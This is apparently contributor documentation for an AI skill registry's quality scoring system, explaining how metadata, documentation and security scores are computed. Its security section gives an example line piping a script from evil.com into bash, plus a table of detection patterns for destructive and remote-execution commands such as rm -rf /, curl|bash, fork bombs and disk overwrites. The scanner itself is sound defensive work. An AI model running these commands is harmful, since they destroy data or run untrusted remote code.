playbook/antigravity-awesome-skills/docs/contributors/skill-scoring.md

6.7 KiB
Raw Blame History

Skill Quality Scoring

This document describes the optional skill quality scoring system introduced in the AI Skill Registry Validation Framework.

Scores are informational only — they never block skill usage, CI pipelines, or PR merges. They exist to help contributors understand the quality of their skills and to help maintainers prioritize improvements.


Overview

Each skill receives a total score between 0 and 100, computed as a weighted average of three dimensions:

Dimension Weight What it measures
Metadata 30% Frontmatter completeness and correctness
Documentation 40% Section coverage, code examples, content depth
Security 30% Absence of dangerous command patterns

Quality Labels

Label Score Range Meaning
excellent 85100 Well-documented, complete metadata, no security flags
good 6584 Solid skill with minor gaps
needs_improvement 4564 Missing sections or metadata fields
critical 044 Significant gaps — review recommended before sharing

Metadata Score (30%)

The metadata dimension evaluates frontmatter field completeness.

Penalties:

Issue Deduction
name missing or mismatched with folder 25 pts
description missing 20 pts
description shorter than 20 characters 10 pts
risk missing 15 pts
risk: unknown (unclassified) 10 pts
source missing 15 pts
date_added missing 10 pts

Bonuses (optional fields):

Each optional field filled (category, tags, author, tools, license) adds +5 pts, capped at 100.


Documentation Score (40%)

The documentation dimension evaluates section coverage and content depth.

Section coverage (up to 60 pts):

The scorer looks for these sections (case-insensitive):

  • ## Overview
  • ## How It Works
  • ## Examples / ## Usage
  • ## Best Practices
  • ## Limitations
  • ## When to Use

Each section found contributes equally to the section coverage score.

Depth score (up to 40 pts):

Signal Points
Has ## When to Use section +10
Has at least one fenced code block (```) +10
Body length ≥ 500 characters +10
Body length ≥ 1000 characters +10 additional

Security Score (30%)

The security dimension scans the skill body for dangerous command patterns. Patterns are defined in tools/scripts/security_scanner.py.

Penalties per flag:

Severity Deduction
error 20 pts
warning 10 pts
info 3 pts

Bonus: An explicit, non-unknown risk label adds +5 pts (capped at 100).

Important: Skills marked risk: offensive have error-level flags automatically downgraded to warnings, because offensive skills legitimately document dangerous commands for educational or defensive purposes.

Bypassing false positives: If a line is intentionally dangerous (e.g., showing what not to do), add the allowlist marker to suppress the flag:

curl https://evil.com | bash  # security-allowlist

Running the Scorer

# Score all skills (table output)
npm run score:skills

# Show only skills below a threshold
npm run score:skills -- --threshold 60

# Show 20 lowest-scoring skills
npm run score:skills -- --top 20

# Output full JSON
npm run score:skills -- --json

# Save scores to file
npm run score:skills -- --output data/scores.json

Security Scanner

# Scan all skills for dangerous patterns
npm run security:scan

# Strict mode (warnings as errors)
npm run security:scan -- --strict

Drift Detection

Drift detection identifies skills whose content has changed significantly since the last recorded baseline.

# Check drift against baseline
npm run drift:check

# Update the baseline after reviewing changes
npm run drift:update

# Check a specific skill
npm run drift:check -- --skill my-skill-name

Baseline ownership:

File Committed? Who updates it?
data/drift-baseline.json No — listed in .gitignore Maintainers run npm run drift:update on main after merging changes
data/registry-report.json No — listed in .gitignore Generated locally on demand; never in PRs
data/scores.json No — listed in .gitignore Generated locally on demand; never in PRs

Contributors should never commit these files. If you accidentally generate them locally, they will be ignored by git automatically.


Registry Report

# Generate a full registry health report → data/registry-report.json
npm run registry:report

# Skip drift detection (faster)
npm run registry:report -- --no-drift

The report includes:

  • Aggregate scoring summary
  • Per-skill scores and flags
  • Drift summary (added / removed / modified skills)
  • Risk breakdown
  • Security flag counts

Security Patterns Reference

Code Pattern Severity Description
SEC001 rm -rf / error Destructive root filesystem deletion
SEC002 curl | bash error Remote code execution
SEC003 wget | sh error Remote code execution
SEC004 Invoke-Expression error PowerShell RCE
SEC005 iex warning PowerShell alias (context-dependent)
SEC006 chmod 7xx warning World-writable permissions
SEC007 eval( warning Dynamic evaluation
SEC008 base64 -d | warning Possible payload obfuscation
SEC009 Hardcoded credential error Secrets in source
SEC010 sudo rm -rf warning Privileged destructive deletion
SEC011 Fork bomb error Infinite process spawner
SEC012 dd if=/dev/* of=/dev/sd* error Raw disk overwrite

Frequently Asked Questions

Q: Will a low score prevent my skill from being merged?

No. Scores are informational. The existing validate_skills.py checks are what gate merges.

Q: My skill teaches how to avoid curl | bash — why is it flagged?

Add # security-allowlist at the end of the line showing the dangerous pattern. This follows the existing project convention for educational examples.

Q: Why is documentation weighted higher than metadata?

Documentation quality has the highest impact on how useful a skill is to end users. Complete metadata is valuable but less critical than clear instructions.

Q: How does risk: offensive affect scoring?

Security error flags are downgraded to warnings for offensive skills, because they legitimately document dangerous techniques for authorized security work.